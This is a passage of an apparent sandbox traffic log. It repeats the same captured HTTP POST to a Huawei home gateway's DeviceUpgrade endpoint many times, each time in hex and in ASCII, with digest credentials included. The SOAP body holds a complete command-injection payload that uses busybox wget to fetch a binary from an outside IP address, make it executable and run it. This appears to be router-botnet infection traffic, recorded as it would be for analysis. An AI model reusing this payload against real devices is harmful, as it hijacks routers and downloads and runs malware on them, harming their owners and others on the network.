62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
